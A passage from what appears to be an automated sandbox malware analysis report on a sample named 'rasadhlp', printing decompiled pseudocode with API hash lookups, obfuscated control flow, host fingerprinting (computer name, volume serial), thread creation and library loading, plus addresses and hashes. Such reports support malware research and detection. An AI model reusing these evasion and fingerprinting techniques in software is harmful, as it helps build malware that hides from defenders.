                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ChangeFindFirstNotification
                                                                                • String ID:
                                                                                • API String ID: 1065410024-0
                                                                                • Opcode ID: cc2b325e92914f5a0bc196f3545d693919c592c982048b3180cef8df239f20d1
                                                                                • Instruction ID: 6693884b5d84308ed4fd31c087872e18750912b86ccf75f71e2e9d131ff21ca6
                                                                                • Opcode Fuzzy Hash: cc2b325e92914f5a0bc196f3545d693919c592c982048b3180cef8df239f20d1
                                                                                • Instruction Fuzzy Hash: 8B51C6317042305BDB2BAF79F892B7A36EAABA4754F11042EF416CF391E934CD019B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00326060, Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E00326060(void* __ecx, void* __edx, void* __ebp) {
				char _v16;
				long _v20;
				void* __ebx;
				void* _t10;
				int _t13;
				intOrPtr* _t17;
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t21;
				char _t27;
				void* _t28;
				void* _t29;
				signed int _t31;
				char* _t45;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t59;

				_t56 = __ebp;
				_t51 = __ecx;
				_v20 = 0x10;
				_t29 = E00325500(_t28, __ebp);
				_t10 = 0x2ffbd16a;
				while(1) {
					L1:
					_t59 = _t10 - 0x1d42a4ce;
					if(_t59 > 0) {
						break;
					}
					if(_t59 == 0) {
						if( *0x32dc7c == 0) {
							 *0x32dc7c = E00323E60(_t29, E00323F00(0x9bab0b12), 0xf02a6b30, _t56);
						}
						_t13 = GetComputerNameA( &_v16,  &_v20); // executed
						if(_t13 == 0) {
							goto L23;
						} else {
							_t10 = 0x19fdc91a;
							continue;
						}
					} else {
						if(_t10 == 0x141a6c5f) {
							_t54 = E003235C0(0x32d2f0);
							_t17 =  *0x32dc98;
							if(_t17 == 0) {
								_t17 = E00323E60(_t29, E00323F00(0xc6fbcd74), 0xe71324c6, _t56);
								 *0x32dc98 = _t17;
							}
							_t18 =  *_t17(_t51, 0x19, _t54,  &_v16, _t29);
							_t19 =  *0x32e494;
							_t31 = 0 | _t18 > 0x00000000;
							if(_t19 == 0) {
								_t19 = E00323E60(_t31, E00323F00(0x9bab0b12), 0x7facde30, _t56);
								 *0x32e494 = _t19;
							}
							_t52 =  *_t19();
							_t21 =  *0x32df30;
							if(_t21 == 0) {
								_t21 = E00323E60(_t31, E00323F00(0x9bab0b12), 0x5010a54d, _t56);
								 *0x32df30 = _t21;
							}
							 *_t21(_t52, 0, _t54);
							return _t31;
						} else {
							if(_t10 != 0x19fdc91a) {
								L22:
								if(_t10 != 0x109d9459) {
									continue;
								} else {
									L23:
									return 0;
								}
							} else {
								_t45 =  &_v16;
								if(_v16 != 0) {
									do {
										_t27 =  *_t45;
										if(_t27 < 0x30 || _t27 > 0x39) {
											if(_t27 < 0x61 || _t27 > 0x7a) {
												if(_t27 < 0x41 || _t27 > 0x5a) {
													 *_t45 = 0x58;
												}
											}
										}
										_t45 = _t45 + 1;
									} while ( *_t45 != 0);
								}
								_t10 = 0x141a6c5f;
								continue;
							}
						}
					}
					L31:
				}
				if(_t10 != 0x2ffbd16a) {
					goto L22;
				} else {
					_t10 = 0x1d42a4ce;
					goto L1;
				}
				goto L31;
			}





















                                                                                0x00326060
                                                                                0x00326065
                                                                                0x00326067
                                                                                0x00326074
                                                                                0x00326076
                                                                                0x00326080
                                                                                0x00326080
                                                                                0x00326080
                                                                                0x00326085
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0032608b
                                                                                0x003260e1
                                                                                0x003260f9
                                                                                0x003260f9
                                                                                0x00326108
                                                                                0x0032610c
                                                                                0x00000000
                                                                                0x0032610e
                                                                                0x0032610e
                                                                                0x00000000
                                                                                0x0032610e
                                                                                0x0032608d
                                                                                0x00326092
                                                                                0x00326147
                                                                                0x00326149
                                                                                0x00326150
                                                                                0x00326163
                                                                                0x00326168
                                                                                0x00326168
                                                                                0x00326177
                                                                                0x00326180
                                                                                0x00326185
                                                                                0x0032618a
                                                                                0x0032619d
                                                                                0x003261a2
                                                                                0x003261a2
                                                                                0x003261a9
                                                                                0x003261ab
                                                                                0x003261b2
                                                                                0x003261c5
                                                                                0x003261ca
                                                                                0x003261ca
                                                                                0x003261d3
                                                                                0x003261dd
                                                                                0x00326098
                                                                                0x0032609d
                                                                                0x00326129
                                                                                0x0032612e
                                                                                0x00000000
                                                                                0x00326135
                                                                                0x00326135
                                                                                0x0032613b
                                                                                0x0032613b
                                                                                0x003260a3
                                                                                0x003260a8
                                                                                0x003260ac
                                                                                0x003260b0
                                                                                0x003260b0
                                                                                0x003260b4
                                                                                0x003260bc
                                                                                0x003260c4
                                                                                0x003260ca
                                                                                0x003260ca
                                                                                0x003260c4
                                                                                0x003260bc
                                                                                0x003260cd
                                                                                0x003260ce
                                                                                0x003260b0
                                                                                0x003260d3
                                                                                0x00000000
                                                                                0x003260d3
                                                                                0x0032609d
                                                                                0x00326092
                                                                                0x00000000
                                                                                0x0032608b
                                                                                0x0032611d
                                                                                0x00000000
                                                                                0x0032611f
                                                                                0x0032611f
                                                                                0x00000000
                                                                                0x0032611f
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00325500: GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 003255A1
                                                                                • GetComputerNameA.KERNEL32(?,00000010), ref: 00326108
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ComputerInformationNameVolume
                                                                                • String ID:
                                                                                • API String ID: 2991138825-0
                                                                                • Opcode ID: 453cacb2a2eab1a39f2525ab0e8e8d0fc410002fcd221a863feb159d7a280db5
                                                                                • Instruction ID: 472bcd9f1d7dc79892ba2fe53651ce9657123d220f966894f3546e48507db0b5
                                                                                • Opcode Fuzzy Hash: 453cacb2a2eab1a39f2525ab0e8e8d0fc410002fcd221a863feb159d7a280db5
                                                                                • Instruction Fuzzy Hash: 2B3166317082301BDB27AB7DBC8377B268A9F91704F91882DE046CF256EE24DC069753
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00329F30, Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00329F30(void* __ebx) {
				void* _t7;
				intOrPtr* _t8;
				intOrPtr _t9;
				intOrPtr* _t11;
				intOrPtr* _t13;
				void* _t20;
				void* _t25;
				intOrPtr _t27;
				void* _t40;
				void* _t41;

				_t25 = __ebx;
				_t7 = 0x11b28d96;
				L1:
				while(_t7 != 0xce4fa38) {
					if(_t7 == 0x11b28d96) {
						_t11 =  *0x32e494;
						if(_t11 == 0) {
							_t11 = E00323E60(_t25, E00323F00(0x9bab0b12), 0x7facde30, _t41);
							 *0x32e494 = _t11;
						}
						_t40 =  *_t11();
						_t13 =  *0x32dd18;
						if(_t13 == 0) {
							_t13 = E00323E60(_t25, E00323F00(0x9bab0b12), 0x9ff0609c, _t41);
							 *0x32dd18 = _t13;
						}
						_t27 =  *_t13(_t40, 8, 0x20);
						 *0x32e550 = _t27;
						if(_t27 == 0) {
							goto L18;
						} else {
							_t7 = 0xce4fa38;
							continue;
						}
					} else {
						if(_t7 == 0x33fbe40a) {
							if( *0x32de50 == 0) {
								 *0x32de50 = E00323E60(_t25, E00323F00(0x9bab0b12), 0x676edf3, _t41);
							}
							_t20 = CreateThread(0, 0, E00329B60, 0, 0, 0);
							_t27 =  *0x32e550; // 0x54e2f8
							 *(_t27 + 0x18) = _t20;
							L18:
							return 0 | _t27 != 0x00000000;
						} else {
							if(_t7 != 0x1dffa4f5) {
								continue;
							} else {
								return 0 | _t27 != 0x00000000;
							}
						}
					}
				}
				_t8 =  *0x32de6c;
				if(_t8 == 0) {
					_t8 = E00323E60(_t25, E00323F00(0x9bab0b12), 0x747563ac, _t41);
					 *0x32de6c = _t8;
				}
				_t9 =  *_t8(0, 0, 0, 0);
				_t27 =  *0x32e550; // 0x54e2f8
				 *((intOrPtr*)(_t27 + 0x14)) = _t9;
				_t7 = 0x33fbe40a;
				goto L1;
			}













                                                                                0x00329f30
                                                                                0x00329f36
                                                                                0x00000000
                                                                                0x00329f40
                                                                                0x00329f50
                                                                                0x00329f6d
                                                                                0x00329f74
                                                                                0x00329f87
                                                                                0x00329f8c
                                                                                0x00329f8c
                                                                                0x00329f93
                                                                                0x00329f95
                                                                                0x00329f9c
                                                                                0x00329faf
                                                                                0x00329fb4
                                                                                0x00329fb4
                                                                                0x00329fc0
                                                                                0x00329fc2
                                                                                0x00329fca
                                                                                0x00000000
                                                                                0x00329fd0
                                                                                0x00329fd0
                                                                                0x00000000
                                                                                0x00329fd0
                                                                                0x00329f52
                                                                                0x00329f57
                                                                                0x0032a022
                                                                                0x0032a03a
                                                                                0x0032a03a
                                                                                0x0032a04e
                                                                                0x0032a050
                                                                                0x0032a056
                                                                                0x0032a059
                                                                                0x0032a061
                                                                                0x00329f5d
                                                                                0x00329f62
                                                                                0x00000000
                                                                                0x00329f64
                                                                                0x00329f6c
                                                                                0x00329f6c
                                                                                0x00329f62
                                                                                0x00329f57
                                                                                0x00329f50
                                                                                0x00329fda
                                                                                0x00329fe1
                                                                                0x00329ff4
                                                                                0x00329ff9
                                                                                0x00329ff9
                                                                                0x0032a006
                                                                                0x0032a008
                                                                                0x0032a00e
                                                                                0x0032a011
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,00329B60,00000000,00000000,00000000), ref: 0032A04E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 2b612d4997af58af1778ff7245a05c852ed03584d3223eb6f394538bce41cc88
                                                                                • Instruction ID: c78960271aa254249610fb6fd9ea1c1ff3341684fc7603b6a36fe988bbe3019d
                                                                                • Opcode Fuzzy Hash: 2b612d4997af58af1778ff7245a05c852ed03584d3223eb6f394538bce41cc88
                                                                                • Instruction Fuzzy Hash: F821E730744321ABEB7A9B7DBD1272A239AAB50B44F21042EF505CF2D5FA60DD029786
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00325C00, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00325C00(void* __ecx, void* __edx, void* __ebp) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __ebx;
				intOrPtr* _t3;
				void* _t6;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t19;
				void* _t20;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;

				_t41 = __ebp;
				_t3 =  *0x32e494;
				_t19 = __ecx;
				_t37 = __edx;
				if(_t3 == 0) {
					_t3 = E00323E60(__ecx, E00323F00(0x9bab0b12), 0x7facde30, __ebp);
					 *0x32e494 = _t3;
				}
				_t39 =  *_t3();
				if( *0x32dd18 == 0) {
					 *0x32dd18 = E00323E60(_t19, E00323F00(0x9bab0b12), 0x9ff0609c, _t41);
				}
				_t6 = RtlAllocateHeap(_t39, 8, 0x40000); // executed
				_t40 = _t6;
				if(_t40 == 0) {
					return 0;
				} else {
					_push(_t40);
					_push(_v0);
					_push(_v4);
					_t20 = E003258C0(_t19, _t37);
					_t9 =  *0x32e494;
					if(_t9 == 0) {
						_t9 = E00323E60(_t20, E00323F00(0x9bab0b12), 0x7facde30, _t41);
						 *0x32e494 = _t9;
					}
					_t38 =  *_t9();
					_t11 =  *0x32df30;
					if(_t11 == 0) {
						_t11 = E00323E60(_t20, E00323F00(0x9bab0b12), 0x5010a54d, _t41);
						 *0x32df30 = _t11;
					}
					 *_t11(_t38, 0, _t40);
					return _t20;
				}
			}
















                                                                                0x00325c00
                                                                                0x00325c00
                                                                                0x00325c06
                                                                                0x00325c0a
                                                                                0x00325c0e
                                                                                0x00325c21
                                                                                0x00325c26
                                                                                0x00325c26
                                                                                0x00325c2d
                                                                                0x00325c36
                                                                                0x00325c4e
                                                                                0x00325c4e
                                                                                0x00325c5b
                                                                                0x00325c5d
                                                                                0x00325c61
                                                                                0x00325cd7
                                                                                0x00325c63
                                                                                0x00325c63
                                                                                0x00325c64
                                                                                0x00325c6c
                                                                                0x00325c75
                                                                                0x00325c7a
                                                                                0x00325c81
                                                                                0x00325c94
                                                                                0x00325c99
                                                                                0x00325c99
                                                                                0x00325ca0
                                                                                0x00325ca2
                                                                                0x00325ca9
                                                                                0x00325cbc
                                                                                0x00325cc1
                                                                                0x00325cc1
                                                                                0x00325cca
                                                                                0x00325cd1
                                                                                0x00325cd1

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 00325C5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: e4069e9ad7d2e558ff23a2eddabbf190f83f3069c18126626033104dabfe705a
                                                                                • Instruction ID: 3f64b636710da56643146d6f1c843547d3a8c811129c9eacf8f7d1b27df41492
                                                                                • Opcode Fuzzy Hash: e4069e9ad7d2e558ff23a2eddabbf190f83f3069c18126626033104dabfe705a
                                                                                • Instruction Fuzzy Hash: BC11AC31B007311BDB26ABB9BD4162B2ADF9BE0B54B11003DB004CB266EA34CE025394
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00325500, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00325500(void* __ebx, void* __ebp) {
				char _v520;
				short _v528;
				long _v532;
				intOrPtr* _t7;
				short* _t10;
				WCHAR** _t28;

				_t27 = __ebp;
				_t16 = __ebx;
				_t7 =  *0x32e084;
				 *_t28 = 0;
				if(_t7 == 0) {
					_t7 = E00323E60(__ebx, E00323F00(0x9bab0b12), 0x176c3a02, __ebp);
					 *0x32e084 = _t7;
				}
				_push(0x104);
				_push( &_v520);
				if( *_t7() != 0) {
					_t10 =  &_v528;
					if(_v528 != 0) {
						while( *_t10 != 0x5c) {
							_t10 = _t10 + 2;
							if( *_t10 != 0) {
								continue;
							} else {
							}
							goto L9;
						}
						 *((short*)(_t10 + 2)) = 0;
					}
					L9:
					if( *0x32e098 == 0) {
						 *0x32e098 = E00323E60(_t16, E00323F00(0x9bab0b12), 0xfee49d4e, _t27);
					}
					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
				}
				return _v532;
			}









                                                                                0x00325500
                                                                                0x00325500
                                                                                0x00325506
                                                                                0x0032550b
                                                                                0x00325514
                                                                                0x00325527
                                                                                0x0032552c
                                                                                0x0032552c
                                                                                0x00325531
                                                                                0x0032553a
                                                                                0x0032553f
                                                                                0x00325547
                                                                                0x0032554b
                                                                                0x00325550
                                                                                0x00325556
                                                                                0x0032555d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0032555f
                                                                                0x00000000
                                                                                0x0032555d
                                                                                0x00325563
                                                                                0x00325563
                                                                                0x00325567
                                                                                0x0032556e
                                                                                0x00325586
                                                                                0x00325586
                                                                                0x003255a1
                                                                                0x003255a1
                                                                                0x003255ac

                                                                                APIs
                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 003255A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InformationVolume
                                                                                • String ID:
                                                                                • API String ID: 2039140958-0
                                                                                • Opcode ID: 29e6d89ca3bf750628596cc1f6c55dc91243776d1565b08adf93832ad865e5d7
                                                                                • Instruction ID: eb9f14cb3c1beb5a3127c0afa160fa78b104e29a9f2d438b25eaa38383f23066
                                                                                • Opcode Fuzzy Hash: 29e6d89ca3bf750628596cc1f6c55dc91243776d1565b08adf93832ad865e5d7
                                                                                • Instruction Fuzzy Hash: D911A170610710ABE726EF65EC43B7A77EAAF90B00F65841CA146CB2D0FBB4DA458752
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00327080, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00327080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E003234C0(__ecx);
				if( *0x32dd1c == 0) {
					 *0x32dd1c = E00323E60(__ebx, E00323F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x32e548; // 0x587dc0
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x32e494;
				if(_t7 == 0) {
					_t7 = E00323E60(_t15, E00323F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x32e494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x32df30;
				if(_t9 == 0) {
					_t9 = E00323E60(_t15, E00323F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x32df30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x00327080
                                                                                0x00327082
                                                                                0x00327089
                                                                                0x00327092
                                                                                0x003270aa
                                                                                0x003270aa
                                                                                0x003270b0
                                                                                0x003270b2
                                                                                0x003270b8
                                                                                0x003270bc
                                                                                0x003270c3
                                                                                0x003270d6
                                                                                0x003270db
                                                                                0x003270db
                                                                                0x003270e2
                                                                                0x003270e4
                                                                                0x003270eb
                                                                                0x003270fe
                                                                                0x00327103
                                                                                0x00327103
                                                                                0x00327110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,0032721D,003268AC), ref: 003270B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 53cc19958cd6d56ec59b4da4f612e2570df980712fc2fb93a052b1ccad526842
                                                                                • Instruction ID: bccdbabf55b36b3a5a0ef8e294e850d74c0fee5c4f20626c3ddba346dfca7396
                                                                                • Opcode Fuzzy Hash: 53cc19958cd6d56ec59b4da4f612e2570df980712fc2fb93a052b1ccad526842
                                                                                • Instruction Fuzzy Hash: 0D01A231B142301B9B27BF7ABC4162B2AAFAFD0B48B11442DA415CF319EE38DD029780
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003242C0, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E003242C0(void* __ebx, long __ecx) {
				intOrPtr* _t1;
				void* _t4;
				void* _t16;
				long _t17;
				void* _t18;

				_t8 = __ebx;
				_t1 =  *0x32e494;
				_t17 = __ecx;
				if(_t1 == 0) {
					_t1 = E00323E60(__ebx, E00323F00(0x9bab0b12), 0x7facde30, _t18);
					 *0x32e494 = _t1;
				}
				_t16 =  *_t1();
				if( *0x32dd18 == 0) {
					 *0x32dd18 = E00323E60(_t8, E00323F00(0x9bab0b12), 0x9ff0609c, _t18);
				}
				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
				return _t4;
			}








                                                                                0x003242c0
                                                                                0x003242c0
                                                                                0x003242c6
                                                                                0x003242cb
                                                                                0x003242de
                                                                                0x003242e3
                                                                                0x003242e3
                                                                                0x003242ea
                                                                                0x003242f3
                                                                                0x0032430b
                                                                                0x0032430b
                                                                                0x00324314
                                                                                0x00324318

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00324314
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 73ccdefdb20db6ff26109267811f5844f7d77e2f9c228bbb0406fabadcb107b3
                                                                                • Instruction ID: 3c2068da9e805b8dffe846c8f01fc996719278f1f35e1a95ab3f6279b2a538d6
                                                                                • Opcode Fuzzy Hash: 73ccdefdb20db6ff26109267811f5844f7d77e2f9c228bbb0406fabadcb107b3
                                                                                • Instruction Fuzzy Hash: F5E06D31B442306BAB26BBBEB84296B26AF8FD0B44B11042DB004DB259ED29DD0257E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00310170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 003102F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: c345e64d6ee78b2d4929049c9ceb8d3936ec41767ed426ed60b0da7967464ab6
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: 98512AB1900268ABDB28DF64DD85BDEB778EF88700F004599F509BB250DBB45AC5CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00322230, Relevance: 4.0, Strings: 3, Instructions: 259COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00322230(signed int* __ecx, signed int* __edx) {
				char _v25;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				signed int* _v132;
				signed int* _v136;
				signed int* _v140;
				signed int* _v144;
				signed int* _v148;
				signed int* _v152;
				signed int* _v156;
				signed int* _v160;
				signed int* _v164;
				void* __ebx;
				void* __ebp;
				signed int* _t61;
				signed int _t64;
				signed int _t68;
				intOrPtr _t71;
				signed int _t79;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				intOrPtr _t86;
				signed int _t87;
				intOrPtr _t93;
				signed int _t98;
				signed int _t104;
				signed int* _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t112;
				intOrPtr* _t117;
				signed int* _t133;
				signed int _t137;
				signed int _t143;
				signed int _t144;
				void* _t145;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t151;
				signed int** _t153;
				void* _t155;
				void* _t156;

				_t105 = __ecx;
				_t153 =  &_v140;
				_t104 = _v120;
				_t151 = _v120;
				_v132 = __edx;
				_t146 = 0x3ea70a1;
				_v136 = __ecx;
				_v128 = 0;
				while(1) {
					L1:
					_t61 = _v140;
					do {
						while(1) {
							L2:
							_t155 = _t146 - 0xf573de9;
							if(_t155 > 0) {
								break;
							}
							if(_t155 == 0) {
								_t106 =  *0x32df54;
								_v112 = 0x14;
								__eflags = _t106;
								if(_t106 == 0) {
									_t106 = E00323E60(_t104, E00323F00(0x26f5757c), 0x954f2ac2, _t151);
									 *0x32df54 = _t106;
								}
								_t20 = _t104 + 0x60; // 0x60
								_t64 =  *_t106(_v124, 2, _t20,  &_v112, 0);
								_t105 = _v156;
								__eflags = _t64;
								_t61 = _v160;
								if(_t64 != 0) {
									_t146 = 0x12d660c6;
									_v148 = 1;
									while(1) {
										L1:
										_t61 = _v140;
										goto L2;
									}
								}
								continue;
							} else {
								_t156 = _t146 - 0x7187f49;
								if(_t156 > 0) {
									__eflags = _t146 - 0xd55ea35;
									if(_t146 != 0xd55ea35) {
										goto L8;
									} else {
										_t68 =  *0x32e1e0;
										_t149 = _t105[1];
										_t143 =  *_t105;
										__eflags = _t68;
										if(_t68 == 0) {
											_t68 = E00323E60(_t104, E00323F00(0xc6fbcd74), 0x624eee2, _t151);
											 *0x32e1e0 = _t68;
										}
										 *_t68(_v140, _t143, _t149);
										_t105 = _v136;
										_t153 =  &(_t153[3]);
										_t133 = _v132;
										_t146 = 0x7187f49;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									if(_t156 == 0) {
										_t107 =  *0x32db58;
										__eflags = _t107;
										if(_t107 == 0) {
											_t107 = E00323E60(_t104, E00323F00(0x26f5757c), 0x933eabe2, _t151);
											_t61 = _v140;
											 *0x32db58 = _t107;
										}
										_t71 =  *0x32e544; // 0x5944a8
										_t11 = _t71 + 0x10; // 0x2d60b20
										 *_t107( *_t11, _v124, 1, 0, _t61,  &_v120, _t151);
										_t105 = _v164;
										_t133 = _v160;
										asm("sbb esi, esi");
										_t146 = (_t146 & 0x1dfee662) + 0x12d660c6;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									} else {
										if(_t146 == 0x3ea70a1) {
											_t146 = 0x3272bd97;
											continue;
										} else {
											if(_t146 == 0x715b39b) {
												_t144 = _v128;
												__eflags = _t144;
												if(_t144 == 0) {
													E00324220(_t104,  *_t133);
												}
												return _t144;
											} else {
												goto L8;
											}
										}
									}
								}
							}
							L51:
						}
						__eflags = _t146 - 0x30d54728;
						if(__eflags > 0) {
							__eflags = _t146 - 0x3272bd97;
							if(_t146 != 0x3272bd97) {
								goto L8;
							} else {
								_t79 = _t105[1] + 1;
								__eflags = _t79 & 0x0000000f;
								if((_t79 & 0x0000000f) != 0) {
									_t79 = (_t79 & 0xfffffff0) + 0x10;
									__eflags = _t79;
								}
								_t147 = _t79 + 0x74;
								_t80 =  *0x32e494;
								_t133[1] = _t147;
								__eflags = _t80;
